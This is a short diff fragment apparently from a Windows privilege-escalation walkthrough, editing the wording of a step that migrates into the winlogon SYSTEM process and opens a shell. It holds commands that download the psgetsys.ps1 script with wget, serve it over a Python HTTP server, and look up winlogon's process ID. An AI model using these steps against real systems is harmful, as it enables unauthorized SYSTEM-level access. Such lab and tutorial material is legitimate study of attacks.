Skip to content

 ps winlogon

-6. Migrate to the SYSTEM Process and Open a System Shell with Meterpreter
+6. Migrate to the SYSTEM process and open a shell:

 wget https://raw.githubusercontent.com/decoder-it/psgetsystem/master/psgetsys.ps1

-NOTE: Host the Payload Using Python python -m http.server 80
+Note: Host the script using Python: python -m http.server 80

 (Get-WmiObject Win32_Process -Filter "Name='winlogon.exe'").ProcessId